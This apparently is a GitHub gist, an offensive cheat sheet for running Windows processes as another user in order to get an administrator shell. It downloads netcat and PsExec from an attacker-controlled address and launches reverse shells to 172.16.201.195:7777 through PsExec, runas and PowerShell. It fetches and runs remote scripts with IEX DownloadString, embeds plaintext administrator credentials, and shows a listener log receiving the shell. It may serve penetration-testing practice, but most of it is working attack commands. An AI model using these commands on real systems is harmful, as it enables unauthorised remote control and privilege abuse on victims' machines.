Skip to content

Instantly share code, notes, and snippets.

@haxxinen

haxxinen/win_run_process_as.md

Created February 10, 2020 21:08
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save haxxinen/51a7804f86476500dc19f44ccc6139d0 to your computer and use it in GitHub Desktop.
Save haxxinen/51a7804f86476500dc19f44ccc6139d0 to your computer and use it in GitHub Desktop.
Download ZIP
Run Windows process as another user.
Raw
win_run_process_as.md

1. Prerequisites

1.1. Account must be enabled (net user Administrator /active:yes)
>net user Administrator | findstr "active"
Account active               Yes
1.2. Info about domain and local host name
> wmic computersystem get domain
> systeminfo | findstr "Domain:"
> hostname
1.3. Downloads
>powershell IEX(New-Object Net.WebClient).DownloadFile('http://172.16.201.195:8888/nc64.exe','nc64.exe')
>powershell IEX(New-Object Net.WebClient).DownloadFile('http://172.16.201.195:8888/PsExec64.exe','PsExec64.exe')

2. Expected result

# ncat -nlvp 7777
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 8DA3 D4BA 9D5C 4D30 453A 2748 3DFA 8038 C47C C013
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 172.16.201.164.
Ncat: Connection from 172.16.201.164:50057.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Win10\Desktop>whoami
whoami
desktop-bmrp4pl\administrator

3. PsExec (local only)

>PsExec64.exe -accepteula -d \\%COMPUTERNAME% -u WORKGROUP\Administrator -p admin "nc64.exe" -nd 172.16.201.195 7777 -e cmd.exe

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

nc64.exe started with process ID 1564.

4. Runas

C:\Users\Win10\Desktop>runas /noprofile /user:WORKGROUP\Administrator "nc64.exe -nd 172.16.201.195 7777 -e cmd.exe"
Enter the password for WORKGROUP\Administrator:
Attempting to start nc64.exe -nd 172.16.201.195 7777 -e cmd.exe as user "WORKGROUP\Administrator" ...

5. PowerShell

5.1. Method 1 - A.ps1
$username = 'WORKGROUP\Administrator';
$password = 'admin';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Start-Process nc64.exe -NoNewWindow -Credential $credential -ArgumentList ('-nd','172.16.201.195','7777','-e','cmd.exe')

>echo IEX(New-Object Net.WebClient).DownloadString('http://172.16.201.195:8888/A.ps1') | powershell -noprofile -
5.2. Method 2 - B.ps2 (PSRemoting)
$username = 'WORKGROUP\Administrator';
$password = 'admin';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Invoke-Command -ComputerName $env:computername -Credential $credential -ScriptBlock {C:\nc64.exe -nd 172.16.201.195 7777 -e cmd.exe}

>echo IEX(New-Object Net.WebClient).DownloadString('http://172.16.201.195:8888/B.ps1') | powershell -noprofile -
5.3. Check if PSRemoting is enabled
> [bool](Test-WSMan -ComputerName $env:computername -ErrorAction SilentlyContinue)
> get-service winrm | findstr "Running"
5.4. Enable PSRemoting (test OS)
> Enable-PSRemoting -SkipNetworkProfileCheck
> winrm quickconfig
> Enable-PSRemoting -force
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment